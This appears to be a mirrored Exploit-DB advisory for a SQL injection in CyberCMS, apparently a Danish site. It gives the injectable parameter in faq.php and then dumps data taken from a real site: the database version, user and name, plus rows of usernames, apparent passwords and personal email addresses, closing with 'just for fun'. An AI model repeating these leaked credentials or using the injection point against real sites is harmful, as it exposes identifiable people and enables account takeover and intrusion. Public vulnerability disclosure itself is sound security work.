CyberCMS – SQL Injection

  • 作者: hc0de
    日期: 2010-03-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11895/
  • # Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk<mailto:3%3Amemborg%3Amemborg%3A1%3Amemborg@cyberfusion.dk>
6:Leder:huskerikke:1:john.landbo@morsoe.dk<mailto:6%3ALeder%3Ahuskerikke%3A1%3Ajohn.landbo@morsoe.dk>
...etc.. :) just for fun :P